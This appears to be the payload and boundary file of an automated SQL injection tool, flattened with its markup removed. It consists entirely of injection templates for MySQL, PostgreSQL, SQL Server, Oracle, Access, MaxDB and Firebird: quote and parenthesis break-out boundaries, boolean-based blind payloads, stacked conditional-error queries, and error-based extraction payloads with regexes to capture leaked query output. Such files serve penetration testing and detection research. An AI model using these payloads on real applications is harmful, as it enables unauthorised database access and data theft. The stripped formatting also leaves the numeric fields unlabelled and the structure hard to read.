3 1 1,2 1 ) 4 1 1,2 2 ') 3 1,2,3 1,2 2 ' 5 1 1,2 4 " 1 1 1,2 1 ) AND ([RANDNUM]=[RANDNUM] 2 1 1,2 1 )) AND (([RANDNUM]=[RANDNUM] 3 1 1,2 1 ))) AND ((([RANDNUM]=[RANDNUM] 1 0 1,2,3 1 1 1 1,2 2 ') AND ('[RANDSTR]'='[RANDSTR] 2 1 1,2 2 ')) AND (('[RANDSTR]'='[RANDSTR] 3 1 1,2 2 '))) AND ((('[RANDSTR]'='[RANDSTR] 1 1 1,2 2 ' AND '[RANDSTR]'='[RANDSTR] 2 1 1,2 3 ') AND ('[RANDSTR]' LIKE '[RANDSTR] 3 1 1,2 3 ')) AND (('[RANDSTR]' LIKE '[RANDSTR] 4 1 1,2 3 '))) AND ((('[RANDSTR]' LIKE '[RANDSTR] 2 1 1,2 3 ' AND '[RANDSTR]' LIKE '[RANDSTR] 2 1 1,2 4 ") AND ("[RANDSTR]"="[RANDSTR] 3 1 1,2 4 ")) AND (("[RANDSTR]"="[RANDSTR] 4 1 1,2 4 "))) AND ((("[RANDSTR]"="[RANDSTR] 2 1 1,2 4 " AND "[RANDSTR]"="[RANDSTR] 3 1 1,2 5 ") AND ("[RANDSTR]" LIKE "[RANDSTR] 4 1 1,2 5 ")) AND (("[RANDSTR]" LIKE "[RANDSTR] 5 1 1,2 5 "))) AND ((("[RANDSTR]" LIKE "[RANDSTR] 3 1 1,2 5 " AND "[RANDSTR]" LIKE "[RANDSTR] 2 1 1,2 2 %') AND ('%'=' 3 1 1,2 2 %')) AND (('%'=' 4 1 1,2 2 %'))) AND ((('%'=' 1 1 1,2 2 %' AND '%'=' 5 1 1,2 2 %00') AND ('[RANDSTR]'='[RANDSTR] 4 1 1,2 2 %00' AND '[RANDSTR]'='[RANDSTR] 1 1 1,2 1 -- [RANDSTR] 5 1 1,2 2 ') WHERE [RANDNUM]=[RANDNUM] -- 5 1 1,2 2 ") WHERE [RANDNUM]=[RANDNUM] -- 4 1 1,2 1 ) WHERE [RANDNUM]=[RANDNUM] -- 4 1 1,2 2 ' WHERE [RANDNUM]=[RANDNUM] -- 5 1 1,2 4 " WHERE [RANDNUM]=[RANDNUM] -- 4 1 1,2 1 WHERE [RANDNUM]=[RANDNUM] -- 5 1 1,2 2 ')) AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM] -- 5 1 1,2 2 ")) AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM] -- 5 1 1,2 1 )) AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM] -- 4 1 1,2 2 ') AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM] -- 5 1 1,2 4 ") AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM] -- 4 1 1,2 1 ) AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM] -- 5 1 1 2 '||(SELECT '[RANDSTR]' FROM DUAL WHERE [RANDNUM]=[RANDNUM] )||' 5 1 1 2 '||(SELECT '[RANDSTR]' WHERE [RANDNUM]=[RANDNUM] )||' 5 1 1 1 '+(SELECT [RANDSTR] WHERE [RANDNUM]=[RANDNUM] )+' 5 1 1 2 '+(SELECT '[RANDSTR]' WHERE [RANDNUM]=[RANDNUM] )+' 4 1 1 2 ' IN BOOLEAN MODE) # AND boolean-based blind - WHERE or HAVING clause 1 1 1 1 1 AND [INFERENCE] AND [RANDNUM]=[RANDNUM] AND [RANDNUM]=[RANDNUM1] AND boolean-based blind - WHERE or HAVING clause (MySQL comment) 1 4 1 1 1 AND [INFERENCE] AND [RANDNUM]=[RANDNUM] # AND [RANDNUM]=[RANDNUM1]
MySQL
AND boolean-based blind - WHERE or HAVING clause (Generic comment) 1 4 1 1 1 AND [INFERENCE] AND [RANDNUM]=[RANDNUM] -- AND [RANDNUM]=[RANDNUM1] OR boolean-based blind - WHERE or HAVING clause 1 2 3 1 2 OR ([INFERENCE]) OR ([RANDNUM]=[RANDNUM]) OR ([RANDNUM]=[RANDNUM1]) OR boolean-based blind - WHERE or HAVING clause (MySQL comment) 1 3 3 1 2 OR ([INFERENCE]) OR ([RANDNUM]=[RANDNUM]) # OR ([RANDNUM]=[RANDNUM1])
MySQL
OR boolean-based blind - WHERE or HAVING clause (Generic comment) 1 3 3 1 2 OR ([INFERENCE]) OR ([RANDNUM]=[RANDNUM]) -- OR ([RANDNUM]=[RANDNUM1]) MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE) 1 3 1 1,2,3 1 RLIKE (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 0x28 END)) RLIKE (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 0x28 END)) RLIKE (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE 0x28 END))
MySQL
Generic boolean-based blind - Parameter replace (original value) 1 2 1 1,2,3 3 (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END)) (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END)) (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END)) MySQL boolean-based blind - Parameter replace (MAKE_SET - original value) 1 3 1 1,2,3 3 MAKE_SET([INFERENCE],[ORIGVALUE]) MAKE_SET([RANDNUM]=[RANDNUM],[ORIGVALUE]) MAKE_SET([RANDNUM]=[RANDNUM1],[ORIGVALUE])
MySQL
MySQL boolean-based blind - Parameter replace (ELT - original value) 1 4 1 1,2,3 3 ELT([INFERENCE],[ORIGVALUE]) ELT([RANDNUM]=[RANDNUM],[ORIGVALUE]) ELT([RANDNUM]=[RANDNUM1],[ORIGVALUE])
MySQL
MySQL boolean-based blind - Parameter replace (bool*int - original value) 1 4 1 1,2,3 3 ([INFERENCE])*[ORIGVALUE] ([RANDNUM]=[RANDNUM])*[ORIGVALUE] ([RANDNUM]=[RANDNUM1])*[ORIGVALUE]
MySQL
MySQL >= 5.0 boolean-based blind - Parameter replace (original value) 1 3 1 1,2,3 3 (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)) (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)) (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))
MySQL >= 5.0
MySQL < 5.0 boolean-based blind - Parameter replace (original value) 1 4 1 1,2,3 3 (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END)) (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END)) (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))
MySQL
PostgreSQL boolean-based blind - Parameter replace (GENERATE_SERIES - original value) 1 3 2 1,2,3 3 (SELECT GENERATE_SERIES([ORIGVALUE],[ORIGVALUE],CASE WHEN ([INFERENCE]) THEN 1 ELSE 0 END) LIMIT 1) (SELECT GENERATE_SERIES([ORIGVALUE],[ORIGVALUE],CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) LIMIT 1) (SELECT GENERATE_SERIES([ORIGVALUE],[ORIGVALUE],CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE 0 END) LIMIT 1)
PostgreSQL
Microsoft SQL Server/Sybase boolean-based blind - Parameter replace (original value) 1 3 1 1,3 3 (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END)) (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END)) (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))
Microsoft SQL Server Sybase Windows
Oracle boolean-based blind - Parameter replace (original value) 1 3 1 1,3 3 (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL) (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL) (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)
Oracle
Microsoft Access boolean-based blind - Parameter replace (original value) 1 3 1 1,3 3 IIF([INFERENCE],[ORIGVALUE],1/0) IIF([RANDNUM]=[RANDNUM],[ORIGVALUE],1/0) IIF([RANDNUM]=[RANDNUM1],[ORIGVALUE],1/0)
Microsoft Access
SAP MaxDB boolean-based blind - Parameter replace (original value) 1 3 1 1,3 3 (CASE WHEN [INFERENCE] THEN [ORIGVALUE] ELSE NULL END) (CASE WHEN [RANDNUM]=[RANDNUM] THEN [ORIGVALUE] ELSE NULL END) (CASE WHEN [RANDNUM]=[RANDNUM1] THEN [ORIGVALUE] ELSE NULL END)
SAP MaxDB
Generic boolean-based blind - GROUP BY and ORDER BY clauses 1 3 1 2,3 1 ,(SELECT (CASE WHEN ([INFERENCE]) THEN 1 ELSE 1/(SELECT 0) END)) ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 1/(SELECT 0) END)) ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE 1/(SELECT 0) END)) Generic boolean-based blind - GROUP BY and ORDER BY clauses (original value) 1 4 1 2,3 1 ,(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END)) ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END)) ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END)) MySQL >= 5.0 boolean-based blind - GROUP BY and ORDER BY clauses 1 3 1 2,3 1 ,(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)) ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)) ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))
MySQL >= 5.0
MySQL < 5.0 boolean-based blind - GROUP BY and ORDER BY clauses 1 4 1 2,3 1 ,(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END)) ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END)) ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))
MySQL
Microsoft SQL Server/Sybase boolean-based blind - ORDER BY clause 1 3 1 3 1 ,(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END)) ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END)) ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))
Microsoft SQL Server Sybase Windows
Oracle boolean-based blind - GROUP BY and ORDER BY clauses 1 3 1 2,3 1 ,(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL) ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL) ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)
Oracle
Microsoft Access boolean-based blind - GROUP BY and ORDER BY clauses 1 3 1 2,3 1 ,IIF([INFERENCE],[ORIGVALUE],1/0) ,IIF([RANDNUM]=[RANDNUM],[ORIGVALUE],1/0) ,IIF([RANDNUM]=[RANDNUM1],[ORIGVALUE],1/0)
Microsoft Access
Microsoft SQL Server/Sybase stacked conditional-error blind queries 1 3 0 0 1 ; IF([INFERENCE]) SELECT [RANDNUM] ELSE DROP FUNCTION [RANDSTR] ; IF([RANDNUM]=[RANDNUM]) SELECT [RANDNUM] ELSE DROP FUNCTION [RANDSTR] -- ; IF([RANDNUM]=[RANDNUM1]) SELECT [RANDNUM] ELSE DROP FUNCTION [RANDSTR]
Microsoft SQL Server Sybase Windows
PostgreSQL stacked conditional-error blind queries 1 3 0 0 2 ; SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE 1/(SELECT 0) END) ; SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE 1/(SELECT 0) END) -- ; SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE 1/(SELECT 0) END)
PostgreSQL
MySQL >= 5.0 AND error-based - WHERE or HAVING clause 2 1 0 1 1 AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
MySQL >= 5.0
MySQL >= 5.1 AND error-based - WHERE or HAVING clause (EXTRACTVALUE) 2 2 0 1 1 AND EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]')) AND EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]')) [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
MySQL >= 5.1
MySQL >= 5.1 AND error-based - WHERE or HAVING clause (UPDATEXML) 2 3 0 1 1 AND UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM1]) AND UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]'),[RANDNUM1]) [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
MySQL >= 5.1
MySQL >= 4.1 AND error-based - WHERE or HAVING clause 2 2 0 1 1 AND ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2] UNION SELECT [RANDNUM3] UNION SELECT [RANDNUM4] UNION SELECT [RANDNUM5])a GROUP BY x) AND ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2] UNION SELECT [RANDNUM3] UNION SELECT [RANDNUM4] UNION SELECT [RANDNUM5])a GROUP BY x) [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
MySQL >= 4.1
PostgreSQL AND error-based - WHERE or HAVING clause 2 1 0 1 1 AND [RANDNUM]=CAST('[DELIMITER_START]'||([QUERY])::text||'[DELIMITER_STOP]' AS NUMERIC) AND [RANDNUM]=CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]' AS NUMERIC) [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
PostgreSQL
Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause 2 1 0 1 1 AND [RANDNUM]=CONVERT(INT,(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]')) AND [RANDNUM]=CONVERT(INT,(SELECT '[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]')) [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
Microsoft SQL Server Sybase Windows
Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN) 2 2 0 1 1 AND [RANDNUM] IN (('[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]')) AND [RANDNUM] IN (('[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]')) [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
Microsoft SQL Server Sybase Windows
Oracle AND error-based - WHERE or HAVING clause (XMLType) 2 1 0 1 1 AND [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||'[DELIMITER_START]'||(REPLACE(REPLACE(REPLACE(REPLACE(([QUERY]),' ','[SPACE_REPLACE]'),'$','[DOLLAR_REPLACE]'),'@','[AT_REPLACE]'),'#','[HASH_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL) AND [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||'[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL) [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
Oracle
Oracle AND error-based - WHERE or HAVING clause (UTL_INADDR.GET_HOST_ADDRESS) 2 2 0 1 1 AND [RANDNUM]=UTL_INADDR.GET_HOST_ADDRESS('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]') AND [RANDNUM]=UTL_INADDR.GET_HOST_ADDRESS('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]') [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
Oracle >= 8.1.6
Oracle AND error-based - WHERE or HAVING clause (CTXSYS.DRITHSX.SN) 2 3 0 1 1 AND [RANDNUM]=CTXSYS.DRITHSX.SN([RANDNUM],'[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]') AND [RANDNUM]=CTXSYS.DRITHSX.SN([RANDNUM],('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]')) [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
Oracle
Firebird AND error-based - WHERE or HAVING clause 2 2 0 1 1 AND [RANDNUM]=('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]') AND [RANDNUM]=('[DELIMITER_START]'||(SELECT CASE [RANDNUM] WHEN [RANDNUM] THEN 1 ELSE 0 END FROM RDB$DATABASE)||'[DELIMITER_STOP]') [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
Firebird
MySQL >= 5.0 OR error-based - WHERE or HAVING clause 2 2 2 1 2 OR (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) OR (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
MySQL >= 5.0
MySQL >= 5.1 OR error-based - WHERE or HAVING clause (EXTRACTVALUE) 2 3 2 1 1 OR EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]')) OR EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]')) [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
MySQL >= 5.1
MySQL >= 5.1 OR error-based - WHERE or HAVING clause (UPDATEXML) 2 4 2 1 1 OR UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM1]) OR UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]'),[RANDNUM1]) [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
MySQL >= 5.1
MySQL >= 4.1 OR error-based - WHERE or HAVING clause 2 2 2 1 2 OR ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2] UNION SELECT [RANDNUM3] UNION SELECT [RANDNUM4] UNION SELECT [RANDNUM5])a GROUP BY x) OR ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2] UNION SELECT [RANDNUM3] UNION SELECT [RANDNUM4] UNION SELECT [RANDNUM5])a GROUP BY x) [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
MySQL >= 4.1
MySQL OR error-based - WHERE or HAVING clause 2 3 2 1 2 OR 1 GROUP BY CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2)) HAVING MIN(0) OR 1 GROUP BY CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2)) HAVING MIN(0) # [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
MySQL
PostgreSQL OR error-based - WHERE or HAVING clause 2 2 2 1 2 OR [RANDNUM]=CAST('[DELIMITER_START]'||([QUERY])::text||'[DELIMITER_STOP]' AS NUMERIC) OR [RANDNUM]=CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]' AS NUMERIC) [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
PostgreSQL
Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause 2 2 2 1 2 OR [RANDNUM]=CONVERT(INT,(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]')) OR [RANDNUM]=CONVERT(INT,(SELECT '[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]')) [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
Microsoft SQL Server Sybase Windows
Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause (IN) 2 3 2 1 2 OR [RANDNUM] IN (('[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]')) OR [RANDNUM] IN (('[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]')) [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
Microsoft SQL Server Sybase Windows
Oracle OR error-based - WHERE or HAVING clause (XMLType) 2 2 2 1 2 OR [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||'[DELIMITER_START]'||(REPLACE(REPLACE(REPLACE(([QUERY]),' ','[SPACE_REPLACE]'),'$','[DOLLAR_REPLACE]'),'@','[AT_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL) OR [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||'[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL) [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
Oracle
Oracle OR error-based - WHERE or HAVING clause (UTL_INADDR.GET_HOST_ADDRESS) 2 3 2 1 2 OR [RANDNUM]=UTL_INADDR.GET_HOST_ADDRESS('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]') OR [RANDNUM]=UTL_INADDR.GET_HOST_ADDRESS('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]') [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
Oracle >= 8.1.6
Oracle OR error-based - WHERE or HAVING clause (CTXSYS.DRITHSX.SN) 2 4 2 1 2 OR [RANDNUM]=CTXSYS.DRITHSX.SN([RANDNUM],'[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]') OR [RANDNUM]=CTXSYS.DRITHSX.SN([RANDNUM],('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]')) [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
Oracle
Firebird OR error-based - WHERE or HAVING clause 2 3 2 1 2 OR [RANDNUM]=('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]') OR [RANDNUM]=('[DELIMITER_START]'||(SELECT CASE [RANDNUM] WHEN [RANDNUM] THEN 1 ELSE 0 END FROM RDB$DATABASE)||'[DELIMITER_STOP]') [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
Firebird
MySQL >= 5.0 error-based - Parameter replace 2 3 0 1,2,3 3 (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
MySQL >= 5.0
MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE) 2 3 0 1,2,3 3 (EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'))) (EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]'))) [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
MySQL >= 5.1
MySQL >= 5.1 error-based - Parameter replace (UPDATEXML) 2 4 0 1,2,3 3 (UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM1])) (UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]'),[RANDNUM1])) [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
MySQL >= 5.1
